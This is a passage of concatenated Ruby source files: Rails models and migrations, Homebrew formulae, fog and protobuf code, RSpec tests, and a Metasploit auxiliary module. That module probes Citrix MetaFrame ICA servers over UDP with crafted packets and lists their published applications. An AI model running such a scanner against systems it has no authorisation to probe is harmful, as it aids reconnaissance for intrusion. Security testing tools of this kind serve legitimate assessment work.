} } end end end end
30
79
0.452252
8780f88469940ce1f2f310dc35af46f73efa2804
639
class Reportsheet < ApplicationRecord
  belongs_to :user
  has_many :positions, dependent: :destroy

  def add_geoposition(lats, lons, recdates, uid, rsid)
    #position = Position.where("user_id=?", uid).last
    #if position != nil
    #  (0..lats.count-1).each do |i|
    #    if recdates[i] >= position.recdate
    #      Position.create(reportsheet_id: rsid, lat: lats[i], lon: lons[i], recdate: recdates[i], user_id: uid)
    #    end
    #  end
    #else
      (0..lats.count-1).each do |i|
        Position.create(reportsheet_id: rsid, lat: lats[i], lon: lons[i], recdate: recdates[i], user_id: uid)
      end
    #end
  end
end
31.95
112
0.627543
f874875b7eca3bb8ee36c37bafa005b80918a4d8
924
class Gsl114 < Formula
  homepage "https://www.gnu.org/software/gsl/"
  url "http://ftpmirror.gnu.org/gsl/gsl-1.14.tar.gz"
  mirror "https://ftp.gnu.org/gnu/gsl/gsl-1.14.tar.gz"
  sha256 "3d4a47afd9a1e7c73b97791b4180d8cc4d5f0e5db6027fe06437f1f3f957fafb"

  bottle do
    cellar :any
    sha256 "e3e5dcf0d83043554296bc8dc836dcd04c496b8417bd004adab5420dc8c212b5" => :yosemite
    sha256 "5efe0db286ac52fdd72976264d1bdf1852d3d5ae6a6971a0297edc7c2f724e75" => :mavericks
    sha256 "11f5aff7fdbc03258801ae76373ba5d7420f24e1beca93de7435464df0578b19" => :mountain_lion
  end

  option :universal

  def install
    ENV.universal_binary if build.universal?
    system "./configure", "--disable-dependency-tracking", "--prefix=#{prefix}"
    system "make" # "make" and "make install" *must* be done separately
    system "make", "install"
  end

  test do
    system bin/"gsl-config", "--prefix", "--cflags", "--version"
  end
end
31.862069
95
0.739177
180f6963909a6b2805df245777afd39271406f1b
1,717
require 'rubygems'
require 'fog/telefonica' # version >= 1.37

auth_url = "https://example.net:5000/v3/auth/tokens"
username = '[email protected]'
password = 'secret'
project = 'admin'

@connection_params = {
  :telefonica_auth_url => auth_url,
  :telefonica_username => username,
  :telefonica_api_key => password,
  :telefonica_project_name => project,
  :telefonica_domain_id => "default"
}

inspector = Fog::Introspection::Telefonica.new(@connection_params)

# Introspection of an Ironic node
ironic = Fog::Baremetal::Telefonica.new(@connection_params)
nodes = ironic.list_nodes
node1_uuid = nodes.body["nodes"][0]["uuid"]

# Launch introspection
inspector.create_introspection(node1_uuid)

# Introspection status
inspector.get_introspection(node1_uuid)

# Abort introspection
inspector.abort_introspection(node1_uuid)

# Retrieve introspection data
# Note: introspection must be finished and ended successfully
inspector.get_introspection_details(node1_uuid)

## Introspection Rules

# Create a set of rules
rules = {
  "description" => "Successful Rule",
  "actions" => [
    {
      "action" => "set-attribute",
      "path" => "/extra/rule_success",
      "value" => "yes"
    }
  ],
  "conditions" => [
    {
      "field" => "memory_mb",
      "op" => "ge",
      "value" => 256
    },
    {
      "field" => "local_gb",
      "op" => "ge",
      "value" => 1
    }
  ]
}
inspector.create_rules(rules)

# List all rules set
rules1 = inspector.list_rules

# Show a rules set
rules1_uuid = rules1[:body]["rules"][0]['uuid']
inspector.get_rules(rules1_uuid)

# Delete a specific rules set
inspector.delete_rules(rules1_uuid)

# Destroys all rules sets
inspector.delete_rules_all
22.592105
66
0.683168
edf3c46a03d833cb3e7f386f60430e540b592867
137
class AddWantsParticipationToUser < ActiveRecord::Migration
  def change
    add_column :users, :wants_participation, :boolean
  end
end
22.833333
59
0.79562
f84180d47c3bb4e2c322c5df17e0b5fb74a3fa14
522
#! /usr/bin/env ruby -S rspec
require 'spec_helper'

require 'puppet/indirector/file_content/file'

describe Puppet::Indirector::FileContent::File do
  it "should be registered with the file_content indirection" do
    Puppet::Indirector::Terminus.terminus_class(:file_content, :file).should equal(Puppet::Indirector::FileContent::File)
  end

  it "should be a subclass of the DirectFileServer terminus" do
    Puppet::Indirector::FileContent::File.superclass.should equal(Puppet::Indirector::DirectFileServer)
  end
end
34.8
121
0.781609
e899aabdc60b639c650fe99c677f4129847c887d
2,833
module Comet module Rules class Build def initialize(firmware, device) @firmware = firmware @device = device end def target @target ||= Comet::Makefile.fingerprint Hash[ dependencies: Set[rules.map(&:target).uniq] ], extension: :phony end def contents contents = [ ".PHONY: #{target}", "#{target}: #{rules.map(&:target).uniq.join ' '}" ] if fw_target.elf? contents.push "\t$(COMET_CP) #{link.target} #{fw_target.elf_output.path}" end if fw_target.bin? contents.push "\t$(COMET_CP) #{bin.target} #{fw_target.bin_output.path}" end if fw_target.hex? contents.push "\t$(COMET_CP) #{hex.target} #{fw_target.hex_output.path}" end if fw_target.map? contents.push "\t$(COMET_CP) #{link.map_file} #{fw_target.map_output.path}" end contents end def rules @rules ||= [link, bin, hex].compact end def commands { COMET_CP: 'cp' } end private def fw_target @firmware.target_for @device end def bin ObjCopy.new linker, link, 'binary', 'bin' if fw_target.bin? end def hex ObjCopy.new linker, link, 'ihex', 'hex' if fw_target.hex? end def link @link ||= Link.new linker, codegen, libraries, native_sources end def linker @firmware.hardware_for(@device).detect(&:linker?).linker_ end def native_sources @firmware.hardware_for(@device).flat_map do |hardware| hardware.sources.select(&:native?).flat_map(&:files) end end def libraries @firmware.hardware_for(@device).flat_map(&:libraries).uniq(&:name) end def codegen @codegen ||= Codegen.new linker, merge end def merge @merge ||= Merge.new compile end def compile @compile ||= @firmware.imports.flat_map do |software| compile_software software end end def compile_software(software) software.depends.flat_map do |depends| if depends.is_a? Comet::DSL::Software compile_software depends else compile_hardware depends end end + software.sources.reject(&:native?).flat_map do |source| source.files.map do |file| Compile.new source, file, linker end end end def compile_hardware(hardware) return [] unless hardware.targets == @device hardware.sources.reject(&:native?).flat_map do |source| source.files.map do |file| Compile.new source, file, linker end end end end end end
23.806723
85
0.56089
4a6aebae0f3b1b0a94cf24239cd71ae02bf7634d
3,250
require 'rubygems' require 'marc' # ruby gem for working with MARC data in Ruby require 'block_mapper' # the generic mapper class require 'marc_record_ext.rb' # our custom methods require 'base64' # so we can base64 encode the marc21 record class MARCMapper < BlockMapper def initialize() super before_each_source_item do |rec,index| # add custom methods to each marc record rec.extend MARCRecordExt end # remove ; / . , : and spaces from the end cleanup_regexp = /( |;|\/|\.|,|:)+$/ after_each_mapped_value do |field,v| #puts "cleaning up #{field} value(s) before adding to solr..." if v.is_a?(String) v.gsub(cleanup_regexp, '') # clean this string and return elsif v.is_a?(Array) v.map{|vv|vv.gsub(cleanup_regexp, '')} # clean each value and return a new array else v # just return whatever it is end end end # pass in a path to a marc file # a block can be used for logging etc.. # # mapper.from_marc_file('/path/to/data.mrc') do |mapped_doc| # # do something here... logging etc.. # end # # this returns an array of documents (hashes) # def from_marc_file(marc_file, shared_field_data={}, &blk) shared_field_data.each_pair do |k,v| # map each item in the hash to a solr field map k.to_sym, v end map :id do |rec,index| rec['001'].value.gsub(" ","").gsub("/","") end map :title_t do |rec,index| rec.values_for '245', 'a' end map :title_sort do |rec,index| rec.extract '245:a' end map :sub_title_t do |rec,index| rec.values_for '245', 'b' end map :alt_titles_t do |rec,index| rec.extract '240:b 700:t 710:t 711:t 440:a 490:a 505:a 830:a' end map :title_added_entry_t do |rec,index| rec.values_for '700', 't' end map :author_t do |rec,index| rec.extract '100:a 110:a 111:a 130:a 700:a 710:a 711:a' end map :published_t do |rec,index| rec.extract '260:a' end map :isbn_t do |rec,index| rec.isbn # in MARCRecordExt module end map :material_type_t do |rec,index| rec.values_for '300', 'a' end map :subject_t do |rec,index| rec.extract '600:a 610:a 611:a 630:a 650:a 651:a 655:a 690:a' end map :subject_era_facet do |rec,index| rec.extract '650:d 650:y 651:y 655:y' end map :geographic_subject_facet do |rec,index| rec.extract '650:c 650:z 651:a 651:x 651:z 655:z' end map :language_facet do |rec,index| rec.languages # in MARCRecordExt module end # _display is stored, but not indexed # don't store a string, store marc21 so we can read it back out # into a MARC::Record object map :marc_display do |rec,index| rec.to_xml end map :format_facet do |rec,index| rec.format # in MARCRecordExt module end # downcased, format, spaces converted to _ # This can be used for the partial view mapping map :format_code_t do |rec,index| rec.format.to_s.downcase.gsub(/ _/, ' ').gsub(/ /, '_') end reader = MARC::Reader.new(marc_file) self.run(reader, &blk) end end
26.422764
88
0.615077
26a965e622ad453d4f585ac1389795616eb077f3
2,290
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Citrix MetaFrame ICA Published Applications Scanner',
      'Description' => %q{
        This module attempts to query Citrix Metaframe ICA server to
        obtain a published list of applications.
      },
      'Author'      => [ 'patrick' ],
      'Version'     => '$Revision$',
      'References'  =>
        [
          [ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ],
        ]
    ))

    register_options(
      [
        Opt::RPORT(1604),
      ], self.class)
  end

  def autofilter
    false
  end

  def run
    connect_udp

    print_status("Attempting to contact Citrix ICA service...")

    client_connect =
      "\x20\x00\x01\x30\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00" +
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

    # Server hello response
    server_response = "\x30\x00\x02\x31\x02\xfd\xa8\xe3\x02\x00\x06\x44"

    udp_sock.put(client_connect)
    res = udp_sock.get(3)

    if (res[0,server_response.length] == server_response)
      print_status("Citrix MetaFrame ICA server detected. Requesting Published Applications list...")

      find_published =
        "\x2a\x00\x01\x32\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00" +
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x21\x00\x02\x00" +
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

      server_list_pre =
        "\xea\x00\x04\x33\x02\xfd\xa8\xe3\x02\x00\x06\x44\xac\x1f\x03\x1f" +
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" +
        "\x0b\x00\x28\x00\x00\x00\x00\x00"

      udp_sock.put(find_published)
      res = udp_sock.get(3)

      if (res.index(server_list_pre) == 0) # good packet, with following data
        print_status("Citrix Applications Reported:\r\n" + res[server_list_pre.length,res.length].gsub("\x00","\r\n"))
      end
    else
      print_error("Citrix did not report any Published Applications. Try the brute force module instead.")
    end

    disconnect_udp
  end
end
26.321839
114
0.675546
4ac08556448c255e7c3ab51881a3aa2897fed6f2
955
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v3/services/ad_schedule_view_service.proto

require 'google/protobuf'

require 'google/ads/google_ads/v3/resources/ad_schedule_view_pb'
require 'google/api/annotations_pb'
require 'google/api/client_pb'
require 'google/api/field_behavior_pb'
require 'google/api/resource_pb'

Google::Protobuf::DescriptorPool.generated_pool.build do
  add_file("google/ads/googleads/v3/services/ad_schedule_view_service.proto", :syntax => :proto3) do
    add_message "google.ads.googleads.v3.services.GetAdScheduleViewRequest" do
      optional :resource_name, :string, 1
    end
  end
end

module Google
  module Ads
    module GoogleAds
      module V3
        module Services
          GetAdScheduleViewRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.services.GetAdScheduleViewRequest").msgclass
        end
      end
    end
  end
end
31.833333
163
0.769634
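A minimal usage sketch for the generated message class above; the resource name string is a made-up placeholder and the example assumes only the standard google-protobuf runtime.

# Hypothetical example; the resource_name value is illustrative only.
req = Google::Ads::GoogleAds::V3::Services::GetAdScheduleViewRequest.new(
  resource_name: 'customers/123/adScheduleViews/456'
)

bytes   = Google::Ads::GoogleAds::V3::Services::GetAdScheduleViewRequest.encode(req)
decoded = Google::Ads::GoogleAds::V3::Services::GetAdScheduleViewRequest.decode(bytes)
decoded.resource_name # => "customers/123/adScheduleViews/456"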
b9500033ed6d3f0a521ee642ce9bab2da6ea1d0f
194
class RemoveUserLogin < ActiveRecord::Migration
  def change
    remove_column :repositories, :user_login, :string
    change_column :repositories, :user_id, :integer, null: false
  end
end
27.714286
64
0.747423
bb7e8c3cf8261e3b32042b8cd7a8193e9605d064
171
class AddNameToApnApps < ActiveRecord::Migration
  def self.up
    add_column :apn_apps, :name, :string
  end

  def self.down
    remove_column :apn_apps, :name
  end
end
19
48
0.725146
f85d8254dc62b48dd5b055fdebff6b1e5b142b06
365
cask 'processing2' do
  version '2.2.1'
  sha256 '8c237b3eb50626e8ffc648bfdeddaa18ceffbd6a48f8fec77a8eab5b774971fc'

  url "http://download.processing.org/processing-#{version}-macosx.zip"
  name 'Processing'
  homepage 'https://processing.org/'

  conflicts_with cask: 'processing'

  app 'Processing.app'

  zap delete: '~/Library/Processing/preferences.txt'
end
24.333333
75
0.761644
9131437d03f782288e3f34c4f0364f2bc54688bb
642
require 'forwardable'

require 'ku/ldap'

module KU
  module Media
    class Group < Sequel::Model
      unrestrict_primary_key

      extend Forwardable

      DIRECTORY = KU::LDAP

      def_delegators :entry, :description, :members, :member?

      many_to_many :collections, key: :author_id

      def self.admin_group
        self[ENV['LDAP_ADMIN_GROUP'] || 'fak-itm-editor']
      end

      def validate
        super
        errors.add(:entry, 'must exist in directory') unless id && entry
      end

      private

      def entry
        DIRECTORY.group id
      end
    end
  end
end
18.882353
72
0.573209
bbaeb18746793433777a2442a2bc3bfaa3839cb5
243
class AddCurrencyToAccountVersions < ActiveRecord::Migration
  def up
    add_column :account_versions, :currency, :integer
    remove_column :account_versions, :detail
  end

  def down
    raise ActiveRecord::IrreversibleMigration
  end
end
22.090909
60
0.777778
616e15e1cc8054cd6edf882c9121eb3f490912e1
1006
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `bin/rails
# db:schema:load`. When creating a new database, `bin/rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.

ActiveRecord::Schema.define(version: 2021_04_02_205102) do

  create_table "cosmetics", force: :cascade do |t|
    t.string "name"
    t.string "brand"
    t.integer "user_id"
  end

  create_table "users", force: :cascade do |t|
    t.string "username"
    t.string "password_digest"
  end

end
37.259259
86
0.759443
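The schema above only defines tables; below is a sketch of the model classes it implies. The class names follow Rails conventions, but the associations and has_secure_password are assumptions inferred from the columns, not part of the dump.

# Hypothetical models inferred from the cosmetics/users tables above.
class User < ActiveRecord::Base
  has_secure_password   # assumed from the password_digest column
  has_many :cosmetics   # assumed from cosmetics.user_id
end

class Cosmetic < ActiveRecord::Base
  belongs_to :user      # assumed from the user_id column
end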
082116d1d77970c8e57ab0a51001118a38e00a91
335
class RegularEventUpdateJob < ApplicationJob
  queue_as :default

  def perform(*args)
    RegularEvents::Daily1UpdateJob.perform_now
    RegularEvents::Daily2UpdateJob.perform_now
    RegularEvents::Weekly1UpdateJob.perform_now
    RegularEvents::Weekly2UpdateJob.perform_now
    RegularEvents::MonthlyUpdateJob.perform_now
  end
end
27.916667
47
0.814925
1d2f5259d3c161fa36df3a0d818d83f39860260a
1055
require "language/node" class FirebaseCli < Formula desc "Firebase command-line tools" homepage "https://firebase.google.com/docs/cli/" url "https://registry.npmjs.org/firebase-tools/-/firebase-tools-7.8.1.tgz" sha256 "76cf2d485de8a83294daa8e24568df9b3749a71c81429544ce55dc14aae5dfc2" head "https://github.com/firebase/firebase-tools.git" bottle do cellar :any_skip_relocation sha256 "e22cfca782e05c9009756f05fbd79620e2b6a74a06bb462caa6d225ae98d02d4" => :catalina sha256 "5226ee842c7336c8e89fa44b7825d53c16912bd514b10c14000fafe5956f121b" => :mojave sha256 "b46f8569cd88a50b4552fe998f7d89a413f0c549126736d02c535103cd8b61c5" => :high_sierra end depends_on "node" def install system "npm", "install", *Language::Node.std_npm_install_args(libexec) bin.install_symlink Dir["#{libexec}/bin/*"] end test do (testpath/"test.exp").write <<~EOS spawn #{bin}/firebase login:ci --no-localhost expect "Paste" EOS assert_match "authorization code", shell_output("expect -f test.exp") end end
32.96875
93
0.75545
385e1c4bb14a468f387d0c7fbf5a4d5893a5511a
1593
# frozen_string_literal: true
require 'json'

module HttpJson

  class Responder

    def initialize(requester, exception_class)
      @requester = requester
      @exception_class = exception_class
    end

    # - - - - - - - - - - - - - - - - - - - - -

    def get(path, args)
      response = requester.get(path, args)
      unpacked(response.body, path.to_s, args)
    rescue Exception => e
      fail exception_class.new(e.message)
    end

    # - - - - - - - - - - - - - - - - - - - - -

    def post(path, args)
      response = requester.post(path, args)
      unpacked(response.body, path.to_s, args)
    rescue Exception => e
      fail exception_class.new(e.message)
    end

    private

    attr_reader :requester, :exception_class

    def unpacked(body, path, args)
      json = JSON.parse!(body)
      unless json.is_a?(Hash)
        fail service_error(path, args, body, 'body is not JSON Hash')
      end
      if json.has_key?('exception')
        fail service_error(path, args, body, json['exception'])
      end
      unless json.has_key?(path)
        fail service_error(path, args, body, 'body is missing :path key')
      end
      json[path]
    rescue JSON::ParserError
      fail service_error(path, args, body, 'body is not JSON')
    end

    def service_error(path, args, body, message)
      $stdout.puts(JSON.pretty_generate({
        "Exception: HttpJson::Responder": {
          path:path,
          args:args,
          body:body,
          message:message
        }
      }))
      $stdout.flush
      exception_class.new(message)
    end

  end

end
23.776119
73
0.587571
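A usage sketch for HttpJson::Responder above, driven by a hypothetical requester object; FakeRequester and MyError are illustrative names, not part of the original code.

require 'json'
require 'ostruct'

class MyError < RuntimeError; end   # hypothetical exception class

class FakeRequester                 # hypothetical requester double
  def get(_path, _args)
    OpenStruct.new(body: JSON.generate('ready' => true))
  end

  def post(path, args)
    get(path, args)
  end
end

responder = HttpJson::Responder.new(FakeRequester.new, MyError)
responder.get(:ready, {})  # => true, the value unwrapped from the "ready" key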
aba2cf7cdea95a1d33a51fa2aa227b3e9f2604ad
272
class AddIndexToEveryIdField < ActiveRecord::Migration
  def change
    add_index :locations, :topic_id
    add_index :references, :reference_type_id
    add_index :references, :reference_source_id
    add_index :references, :topic_id
    add_index :topics, :user_id
  end
end
27.2
54
0.779412
6224794e3b227e7e0d440902f38dc053b6c88deb
128
require 'test_helper'

class UserPoliticianTest < ActiveSupport::TestCase
  # test "the truth" do
  #   assert true
  # end
end
16
50
0.71875
082e30bbf36c1d02888e158951aaf2e8b24cb81b
836
module Cryptoexchange::Exchanges
  module Koinex
    module Services
      class Pairs < Cryptoexchange::Services::Pairs
        PAIRS_URL = "#{Cryptoexchange::Exchanges::Koinex::Market::API_URL}/ticker"

        def fetch
          output = super
          adapt(output["prices"])
        end

        def adapt(output)
          market_pairs = []
          output.each do |target_raw|
            target = GetSymbol.get_symbol(target_raw[0])
            target_raw[1].each do |base|
              market_pairs << Cryptoexchange::Models::MarketPair.new(
                base:   base[0],
                target: target,
                market: Koinex::Market::NAME
              )
            end
          end
          market_pairs
        end
      end
    end
  end
end
27.866667
82
0.495215
6a3c3a1a7815611cb884cefc48e42b6889177dc0
364
# Copyright (c) Facebook, Inc. and its affiliates.
name 'cpe_powermanagement'
maintainer 'Facebook'
maintainer_email '[email protected]'
license 'BSD'
description 'Manages powermanagement settings / profile'
long_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))
version '0.1.0'
supports 'mac_os_x'

depends 'cpe_profiles'
depends 'cpe_utils'
28
72
0.791209
7acc0cea58106b78e02011163bca2de088f8e41f
4622
# frozen_string_literal: true require 'spec_helper' module Alchemy describe Api::ElementsController do routes { Alchemy::Engine.routes } describe '#index' do let(:page) { create(:alchemy_page, :public) } before do 2.times { create(:alchemy_element, page: page) } create(:alchemy_element, :nested, page: page) end it "returns all public not nested elements as json objects" do get :index, params: {format: :json} expect(response.status).to eq(200) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result).to have_key('elements') expect(result['elements'].last['nested_elements']).to_not be_empty expect(result['elements'].size).to eq(Alchemy::Element.not_nested.count) end context 'with page_id param' do let!(:other_page) { create(:alchemy_page, :public) } let!(:other_element) { create(:alchemy_element, page: other_page) } it "returns only elements from this page" do get :index, params: {page_id: other_page.id, format: :json} expect(response.status).to eq(200) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result).to have_key('elements') expect(result['elements'].size).to eq(1) expect(result['elements'][0]['page_id']).to eq(other_page.id) end end context 'with empty page_id param' do it "returns all not nested elements" do get :index, params: {page_id: '', format: :json} expect(response.status).to eq(200) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result).to have_key('elements') expect(result['elements'].size).to eq(Alchemy::Element.not_nested.count) end end context 'with named param' do let!(:other_element) { create(:alchemy_element, page: page, name: 'news') } it "returns only elements named like this." do get :index, params: {named: 'news', format: :json} expect(response.status).to eq(200) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result).to have_key('elements') expect(result['elements'].size).to eq(1) expect(result['elements'][0]['name']).to eq('news') end end context 'with empty named param' do it "returns all not nested elements" do get :index, params: {named: '', format: :json} expect(response.status).to eq(200) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result).to have_key('elements') expect(result['elements'].size).to eq(Alchemy::Element.not_nested.count) end end context 'as author' do before do authorize_user(build(:alchemy_dummy_user, :as_author)) end it "returns all not nested elements" do get :index, params: {format: :json} expect(response.status).to eq(200) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result).to have_key('elements') expect(result['elements'].size).to eq(Alchemy::Element.not_nested.count) end end end describe '#show' do let(:page) { build_stubbed(:alchemy_page) } let(:element) { build_stubbed(:alchemy_element, page: page, position: 1) } before do expect(Element).to receive(:find).and_return(element) end it "returns element as json" do get :show, params: {id: element.id, format: :json} expect(response.status).to eq(200) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result['id']).to eq(element.id) end context 'requesting an restricted element' do let(:page) { build_stubbed(:alchemy_page, restricted: true) } it "responds with 403" do get :show, params: {id: element.id, format: :json} 
expect(response.status).to eq(403) expect(response.content_type).to eq('application/json') result = JSON.parse(response.body) expect(result).to have_key('error') expect(result['error']).to eq("Not authorized") end end end end end
31.22973
83
0.61402
bb3c8626d32d5329132d87f59eb3eea26d7d23d8
1692
# frozen_string_literal: true

require 'spec_helper'

RSpec.describe Gitlab::Metrics::Dashboard::Stages::MetricEndpointInserter do
  include MetricsDashboardHelpers

  let(:project) { build_stubbed(:project) }
  let(:environment) { build_stubbed(:environment, project: project) }

  describe '#transform!' do
    subject(:transform!) { described_class.new(project, dashboard, environment: environment).transform! }

    let(:dashboard) { load_sample_dashboard.deep_symbolize_keys }

    it 'generates prometheus_endpoint_path without newlines' do
      query = 'avg( sum( container_memory_usage_bytes{ container_name!="POD", '\
              'pod_name=~"^{{ci_environment_slug}}-(.*)", namespace="{{kube_namespace}}" } ) '\
              'by (job) ) without (job) /1024/1024/1024'

      transform!

      expect(all_metrics[2][:prometheus_endpoint_path]).to eq(prometheus_path(query))
    end

    it 'includes a path for the prometheus endpoint with each metric' do
      transform!

      expect(all_metrics).to satisfy_all do |metric|
        metric[:prometheus_endpoint_path].present? && !metric[:prometheus_endpoint_path].include?("\n")
      end
    end

    it 'works when query/query_range is a number' do
      query = 2000

      transform!

      expect(all_metrics[1][:prometheus_endpoint_path]).to eq(prometheus_path(query))
    end
  end

  private

  def all_metrics
    dashboard[:panel_groups].flat_map do |group|
      group[:panels].flat_map { |panel| panel[:metrics] }
    end
  end

  def prometheus_path(query)
    Gitlab::Routing.url_helpers.prometheus_api_project_environment_path(
      project,
      environment,
      proxy_path: :query_range,
      query: query
    )
  end
end
28.2
105
0.700946
1d63f6a520f93eb652d6c9e5acff5f0dd9872296
834
cask 'refined-github-safari' do
  version '2.1.1'
  sha256 '4a912c723abd3d49577437e6ec7d1444ec6bdb8082673b95334ff3f28d08b6ec'

  url "https://github.com/lautis/refined-github-safari/releases/download/v#{version}/Refined-GitHub-for-Safari.zip"
  appcast 'https://github.com/lautis/refined-github-safari/releases.atom'
  name 'Refined GitHub for Safari'
  homepage 'https://github.com/lautis/refined-github-safari'

  depends_on macos: '>= :mojave'

  app 'Refined GitHub for Safari.app'

  zap delete: [
    '~/Library/Application Scripts/fi.lautanala.refined-github',
    '~/Library/Application Scripts/fi.lautanala.refined-github-extension',
    '~/Library/Containers/fi.lautanala.refined-github',
    '~/Library/Containers/fi.lautanala.refined-github-extenstion',
  ]
end
39.714286
115
0.703837
1dd32e6402d514b6d31066bddc9dda9b78969681
1420
class Physfs < Formula
  desc "Library to provide abstract access to various archives"
  homepage "https://icculus.org/physfs/"
  url "https://icculus.org/physfs/downloads/physfs-3.0.2.tar.bz2"
  sha256 "304df76206d633df5360e738b138c94e82ccf086e50ba84f456d3f8432f9f863"
  head "https://hg.icculus.org/icculus/physfs/", using: :hg

  livecheck do
    url "https://icculus.org/physfs/downloads/"
    regex(/href=.*?physfs[._-]v?(\d+(?:\.\d+)+)\.t/i)
  end

  bottle do
    cellar :any
    sha256 "31693a34c610ea382a1b0832065db2b223db549ced6fe6a2f8c569d6b58bf19a" => :catalina
    sha256 "cb97a3a17728f3173d4c19fde495cffbddce965bbf6015e45882e3c27f267cf3" => :mojave
    sha256 "296927566472c976a578f89c4bd6bf0f518427a53d586499a8e202896d469ee3" => :high_sierra
    sha256 "6742501c33943dcdab748b3c2188cf6292f462b82896da001cdbcfbbcc01e489" => :sierra
  end

  depends_on "cmake" => :build

  def install
    mkdir "macbuild" do
      args = std_cmake_args
      args << "-DPHYSFS_BUILD_TEST=TRUE"
      args << "-DPHYSFS_BUILD_WX_TEST=FALSE" unless build.head?

      system "cmake", "..", *args
      system "make", "install"
    end
  end

  test do
    (testpath/"test.txt").write "homebrew"
    system "zip", "test.zip", "test.txt"
    (testpath/"test").write <<~EOS
      addarchive test.zip 1
      cat test.txt
    EOS
    assert_match /Successful\.\nhomebrew/, shell_output("#{bin}/test_physfs < test 2>&1")
  end
end
33.023256
93
0.707746
f7774ea137d0064202fa6867dc3042aa4f329467
908
require File.join( File.dirname(File.expand_path(__FILE__)), '../base')

describe RestClient::Request do
  describe "ssl verification" do
    it "is successful with the correct ca_file" do
      request = RestClient::Request.new(
        :method => :get,
        :url => 'https://www.mozilla.com',
        :verify_ssl => OpenSSL::SSL::VERIFY_PEER,
        :ssl_ca_file => File.join(File.dirname(__FILE__), "certs", "equifax.crt")
      )
      expect { request.execute }.to_not raise_error
    end

    it "is unsuccessful with an incorrect ca_file" do
      request = RestClient::Request.new(
        :method => :get,
        :url => 'https://www.mozilla.com',
        :verify_ssl => OpenSSL::SSL::VERIFY_PEER,
        :ssl_ca_file => File.join(File.dirname(__FILE__), "certs", "verisign.crt")
      )
      expect { request.execute }.to raise_error(RestClient::SSLCertificateNotVerified)
    end
  end
end
34.923077
86
0.640969
5d6eed5198346ca3e9e76a7fc9c618439de98bd7
3962
# frozen_string_literal: true # Cloud Foundry Java Buildpack # Copyright 2013-2018 the original author or authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. require 'spec_helper' require 'component_helper' require 'fileutils' require 'java_buildpack/component/mutable_java_home' require 'java_buildpack/jre/open_jdk_like' require 'java_buildpack/jre/open_jdk_like_jre' require 'java_buildpack/jre/open_jdk_like_memory_calculator' require 'java_buildpack/jre/open_jdk_like_security_providers' describe JavaBuildpack::Jre::OpenJDKLike do include_context 'with component help' let(:component) { StubOpenJDKLike.new context } let(:java_home) { JavaBuildpack::Component::MutableJavaHome.new } let(:version_7) { VERSION_7 = JavaBuildpack::Util::TokenizedVersion.new('1.7.0_+') } let(:version_8) { VERSION_8 = JavaBuildpack::Util::TokenizedVersion.new('1.8.0_+') } let(:configuration) do { 'jre' => jre_configuration, 'memory_calculator' => memory_calculator_configuration, 'jvmkill_agent' => jvmkill_agent_configuration } end let(:jre_configuration) { instance_double('jre_configuration') } let(:jvmkill_agent_configuration) { {} } let(:memory_calculator_configuration) { { 'stack_threads' => '200' } } it 'always supports' do expect(component.supports?).to be end it 'creates submodules' do allow_any_instance_of(StubOpenJDKLike).to receive(:supports?).and_return false allow(JavaBuildpack::Jre::JvmkillAgent) .to receive(:new).with(sub_configuration_context(jvmkill_agent_configuration)) allow(JavaBuildpack::Jre::OpenJDKLikeJre) .to receive(:new).with(sub_configuration_context(jre_configuration).merge(component_name: 'Stub Open JDK Like')) allow(JavaBuildpack::Jre::OpenJDKLikeMemoryCalculator) .to receive(:new).with(sub_configuration_context(memory_calculator_configuration)) allow(JavaBuildpack::Jre::OpenJDKLikeSecurityProviders) .to receive(:new).with(context) component.sub_components context end it 'returns command for Java 7' do java_home.version = version_7 expect(component.command).to eq('CALCULATED_MEMORY=$($PWD/.java-buildpack/open_jdk_like/bin/' \ 'java-buildpack-memory-calculator-0.0.0 -totMemory=$MEMORY_LIMIT' \ ' -loadedClasses=0 -poolType=permgen -stackThreads=200 -vmOptions="$JAVA_OPTS")' \ ' && echo JVM Memory Configuration: $CALCULATED_MEMORY && ' \ 'JAVA_OPTS="$JAVA_OPTS $CALCULATED_MEMORY"') end it 'returns command for Java 8' do java_home.version = version_8 expect(component.command).to eq('CALCULATED_MEMORY=$($PWD/.java-buildpack/open_jdk_like/bin/' \ 'java-buildpack-memory-calculator-0.0.0 -totMemory=$MEMORY_LIMIT' \ ' -loadedClasses=0 -poolType=metaspace -stackThreads=200 -vmOptions="$JAVA_OPTS")' \ ' && echo JVM Memory Configuration: $CALCULATED_MEMORY && ' 